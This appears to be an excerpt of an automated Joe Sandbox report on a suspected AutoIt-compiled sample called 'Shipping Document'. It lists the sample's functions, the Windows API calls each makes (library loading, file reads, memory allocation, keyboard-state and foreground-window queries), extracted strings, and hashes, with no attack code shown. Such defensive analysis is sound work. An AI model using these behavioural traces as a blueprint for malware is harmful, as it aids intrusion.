Instruction ID: 8f0c3622009c4d7e3cab60632eff58d9cb670162031df006bcdf3298995ce9d3
Opcode Fuzzy Hash: 3736cafb92991f82614a90cedb94287a222d50c6183b1c15e27c2f4af532f354
Instruction Fuzzy Hash: 05210531A00A0DEBDB205F12E885B7A7FB8FF40740F21846EE686D1124EF7694E0A751

Function 00FC4F3D Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC4D13: FreeLibrary.KERNEL32(00000000,?), ref: 00FC4D4D

Part of subcall function 00FE548B: __wfsopen.LIBCMT ref: 00FE5496

LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,010862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FC4F6F

Part of subcall function 00FC4CC8: FreeLibrary.KERNEL32(00000000), ref: 00FC4D02

Part of subcall function 00FC4DD0: _memmove.LIBCMT ref: 00FC4E1A

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: Library$Free$Load__wfsopen_memmove
String ID:
API String ID: 1396898556-0
Opcode ID: e2eea9debacd2badac9fc8bb716ceb97386ddce2c13ad754ab799d49c004e554
Instruction ID: 40d317d4d11bebca702011a73ed2594e9e5b6b67d5c8955858d70c54a3169704
Opcode Fuzzy Hash: e2eea9debacd2badac9fc8bb716ceb97386ddce2c13ad754ab799d49c004e554
Instruction Fuzzy Hash: EA11E73260020BABCB14FF74CE67FAE77A59F40711F10842DF941A71C1DA79AA05BBA0

Function 010001AF Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 010001BB

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 54b07f0ca23aad82287800917a89c8a760135c7950642fc101eb8d18e1b45621
Instruction ID: 6839bc1544fa5c5f571c7a574a3a78f3906c3eaa3694fdcd9b6dcec8c5f32ede
Opcode Fuzzy Hash: 54b07f0ca23aad82287800917a89c8a760135c7950642fc101eb8d18e1b45621
Instruction Fuzzy Hash: 0B211FB4908342DFDB25DF65C985F1ABBE0BB84318F04886CE98A47761C735F845DB92

Function 00FE0941 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FE09F4

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: acfb2f6243b039b5672768ffc86251c791cf0114a286c1c20b526726435d8d17
Instruction ID: 11bc0a64a54025b714b72df16cf6a38998a267ac1b6246481cb3cf30f0a63168
Opcode Fuzzy Hash: acfb2f6243b039b5672768ffc86251c791cf0114a286c1c20b526726435d8d17
Instruction Fuzzy Hash: 1201807384A2818FC352C774D95A6D03BB6DE5762932801DDDC429A532E5675C13AB50

Function 00FC5D20 Relevance: 1.6, APIs: 1, Instructions: 53fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00FC5807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00FC5D76

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: d4a9a9d0ba70d058b370f06285ec8d894eb2f73a0098b7dccdf08dd7fc858e24
Instruction ID: b0c01ff4529aa5a52576b4b4d75a03c56a90b2043c77137b5df0bad612d6ff53
Opcode Fuzzy Hash: d4a9a9d0ba70d058b370f06285ec8d894eb2f73a0098b7dccdf08dd7fc858e24
Instruction Fuzzy Hash: D6115871608B029FD3308F05CA85F62B7E4EB45B20F10892EE8AB86A50D771F984DB60

Function 00FC5BDA Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FFE141

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
Instruction ID: 2df2721eb4f9156ce88eddb36ceb1311a44ff3f7bad3867578d0e984e8c5deee
Opcode Fuzzy Hash: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
Instruction Fuzzy Hash: 1B01A779600542AFC305DB29C942E26FBA9FF853143148159F815C7702DB75FC61DBE0

Function 00FE4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 00FE4AD6

Part of subcall function 00FE8D68: __getptd_noexit.LIBCMT ref: 00FE8D68

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 4166419d4f7c8d24f6847da06c398fa2ca6d6aa1c68465d1d7776b04350b418c
Instruction ID: 5695d4dfa45f5eeb2f1b3a7ee6eec8b59ea2b1f304bd36bc9a68783e2bb79a04
Opcode Fuzzy Hash: 4166419d4f7c8d24f6847da06c398fa2ca6d6aa1c68465d1d7776b04350b418c
Instruction Fuzzy Hash: 0CF0AF31D40289ABDF61BF668C063AF36A1AF00775F048528F828AA1D1DB7C9A51FF55

Function 00FC4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,010862F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00FC4FDE

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: aa627b5eaed96fa83defd2fb009054a3c2deb9ed78f0251f2c0b276501191d28
Instruction ID: c6d90210e7c903356aaf45fa3c339eeda5847e7d4a7ccd7260384860e7cff250
Opcode Fuzzy Hash: aa627b5eaed96fa83defd2fb009054a3c2deb9ed78f0251f2c0b276501191d28
Instruction Fuzzy Hash: ACF015B2505712CFCB389F64E5A5E12BBE1AF043293248A2EE5D683A10C772A840EF40

Function 00FE09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FE09F4

Part of subcall function 00FC7D2C: _memmove.LIBCMT ref: 00FC7D66

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: LongNamePath_memmove
String ID:
API String ID: 2514874351-0
Opcode ID: b41c44c60b8027eb031677c67fe116006482fe76821e25d5383b1878c17e2755
Instruction ID: b8ae64170d493905cb9766380aa7bb2c89b999c6ed3dad512c24c1df1ec25213
Opcode Fuzzy Hash: b41c44c60b8027eb031677c67fe116006482fe76821e25d5383b1878c17e2755
Instruction Fuzzy Hash: F5E086769052299BC720E5589C06FFA77ADDF88790F0401B5FD4CD7208D9659C818690

Function 01029129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 0102914B

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 85a266c19ac15f6dd4f37f244161312340f338b31e1d7e5613d3c154e10e17cf
Instruction ID: 52c2e9313693a37e291c8b4e9899284925bd6d27f3b1f403c9eaeeee53cc3c9e
Opcode Fuzzy Hash: 85a266c19ac15f6dd4f37f244161312340f338b31e1d7e5613d3c154e10e17cf
Instruction Fuzzy Hash: BEE092B0104B505FDB798A28D8107E377E0AB06319F00085DF2DA83342EB627841C759

Function 00FC5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,00FFE16B,?,?,00000000), ref: 00FC5DBF

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: feebc1120ae8911a2392ab6ab9a9b4e264f8ae4216e3b71a4c05ee68a4de55fe
Instruction ID: a589d4ba8fbfbd6a2bbaf5377417d3eb3fda3c3b75315c4c401cd6dc18917300
Opcode Fuzzy Hash: feebc1120ae8911a2392ab6ab9a9b4e264f8ae4216e3b71a4c05ee68a4de55fe
Instruction Fuzzy Hash: 70D0C77464020CBFE710DB84DC46FA9777CD705710F100194FD0456290D6B27D508795

Function 00FE548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

__wfsopen.LIBCMT ref: 00FE5496

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: __wfsopen
String ID:
API String ID: 197181222-0
Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction ID: 45f44c800f194e76492d40cf083b43dc43a9e5955b87bca747f1a7c98342ac2b
Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
Instruction Fuzzy Hash: 33B0927684020C77DE022E82EC02A593B199B40A78F808020FB0C181A2A677A6A0A689

Function 0100220E Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetTempPathW.KERNELBASE(00000104,?), ref: 0100221A

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: b92ecb0de9d8a844e977b1f0cae787e5afc9a3e32b79e30edc8e7f9f535dafa2
Instruction ID: 00a6d6629590d338d26a35537d9539abc8d760d1d9793c0dcc7dcfed69efbc2b
Opcode Fuzzy Hash: b92ecb0de9d8a844e977b1f0cae787e5afc9a3e32b79e30edc8e7f9f535dafa2
Instruction Fuzzy Hash: ECC09B7445401A9FF725A754CDD5ABC733CFF00701F0000D5718591080DAF45B80CF11

Function 0102D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000002,00000000), ref: 0102D46A

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 61c4a79935600d8694c0dde5d8c7634a4d5611015122a09d1e1ee04f4ba43c1b
Instruction ID: ac1f78c35e8e417bf09744457658355e107d7f20729dbc24c88ff760e764a79f
Opcode Fuzzy Hash: 61c4a79935600d8694c0dde5d8c7634a4d5611015122a09d1e1ee04f4ba43c1b
Instruction Fuzzy Hash: 2E7161302083128FC714EF68C991FAAB7E0AF88714F04456DF5968B291DF78ED49DB52

Function 00FE0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00FE0EF7

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 6889ebc193a5197ae199a0f35fdea1615ee37309587f54b6db755d99459beeb6
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 81312971A00186DFC718DF4AC480A69F7B2FF59310B688AA5E409CB251DB70EDC0EBD0

Function 01E52300 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 01E52311

Memory Dump Source

Source File: 00000001.00000002.1516553081.0000000001E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1e50000_Shipping Document.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: e16ceb46a303e46deb43ae10c988d141e9cc21d30ac3354acbcf8ff53eb068e7
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: F6E0E67594010EDFDB00EFB4D54969E7FB4EF04301F500561FD01D2281D6309D508A62

Non-executed Functions

Function 0104CDAC Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00FC2612: GetWindowLongW.USER32(?,000000EB), ref: 00FC2623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0104CE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0104CE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0104CED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0104CF00
SendMessageW.USER32 ref: 0104CF29
_wcsncpy.LIBCMT ref: 0104CFA1
GetKeyState.USER32(00000011), ref: 0104CFC2
GetKeyState.USER32(00000009), ref: 0104CFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0104CFE5
GetKeyState.USER32(00000010), ref: 0104CFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0104D018
SendMessageW.USER32 ref: 0104D03F
SendMessageW.USER32(?,00001030,?,0104B602), ref: 0104D145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0104D15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0104D16E
SetCapture.USER32(?), ref: 0104D177
ClientToScreen.USER32(?,?), ref: 0104D1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0104D1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0104D203
ReleaseCapture.USER32 ref: 0104D20E
GetCursorPos.USER32(?), ref: 0104D248
ScreenToClient.USER32(?,?), ref: 0104D255
SendMessageW.USER32(?,00001012,00000000,?), ref: 0104D2B1
SendMessageW.USER32 ref: 0104D2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 0104D31C
SendMessageW.USER32 ref: 0104D34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0104D36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0104D37B
GetCursorPos.USER32(?), ref: 0104D39B
ScreenToClient.USER32(?,?), ref: 0104D3A8
GetParent.USER32(?), ref: 0104D3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 0104D431
SendMessageW.USER32 ref: 0104D462
ClientToScreen.USER32(?,?), ref: 0104D4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0104D4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 0104D51A
SendMessageW.USER32 ref: 0104D53D
ClientToScreen.USER32(?,?), ref: 0104D58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0104D5C3

Part of subcall function 00FC25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FC25EC

GetWindowLongW.USER32(?,000000F0), ref: 0104D65F

Strings

F, xrefs: 0104D543
@GUI_DRAGID, xrefs: 0104D1AA

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F
API String ID: 3977979337-4164748364
Opcode ID: ac525ef531fe3aa90499ba84c21edd31074934b4a9b4a202b9f2072b7072d049
Instruction ID: cf7a391e6659eaa18b4db3871dbb4860fb414c74fcaf84db2daa78508a55fc03
Opcode Fuzzy Hash: ac525ef531fe3aa90499ba84c21edd31074934b4a9b4a202b9f2072b7072d049
Instruction Fuzzy Hash: 2D42BEB4205241AFE725DF68C984FAABFE5FF48354F04056DF6D5872A1C736A840CB92

Function 0104804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0104873F

Strings

%d/%02d/%02d, xrefs: 01048478

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: f3cbc122cf2fb10ec9a2f3b830b7740fd37f4af5dc50b1972ac47e0bc55ed21d
Instruction ID: d76cf44dc4275493cfdcfb024a090ded35eb1490b16b901f724a6f9dfbf180d4
Opcode Fuzzy Hash: f3cbc122cf2fb10ec9a2f3b830b7740fd37f4af5dc50b1972ac47e0bc55ed21d
Instruction Fuzzy Hash: 8E1213B0500245ABEB259FA8CD89FAE7BF8FF49750F00856AFA95EA191DB748540CB10

Function 00FD710E Relevance: 48.8, APIs: 19, Strings: 6, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FD75C2
_memset.LIBCMT ref: 00FD76B1
_memmove.LIBCMT ref: 00FD7C4B
_memmove.LIBCMT ref: 00FD7E4F

Strings

Q\E, xrefs: 00FD81C1
[:<:]], xrefs: 00FD75F1
\b(?<=\w), xrefs: 01013C41
[:>:]], xrefs: 00FD760A
DEFINE, xrefs: 010125AF
\b(?=\w), xrefs: 01013C34

Memory Dump Source

Source File: 00000001.00000002.1516215231.0000000000FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FC0000, based on PE: true

Associated: 00000001.00000002.1516171781.0000000000FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.000000000104F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516267169.0000000001075000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516313074.000000000107F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1516332240.0000000001088000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_fc0000_Shipping Document.jbxd

Similarity

API ID: _memmove$_memset
String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-1798697756
Opcode ID: af6937b09511c39889588a2e3751a1cd7b8400b7facfab1d037aabcae3de7fe5
Instruction ID: 94fe261d8f19de269f3eca581cbdbd4c11bd9119e01c993aa6ff0a4a9b65a679
Opcode Fuzzy Hash: af6937b09511c39889588a2e3751a1cd7b8400b7facfab1d037aabcae3de7fe5
Instruction Fuzzy Hash: A8939171E00215DBDB24DF98C8817ADB7F1FF48320F2885AAE985EB395E7749981DB40

Function 00FC4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00FC4A3D
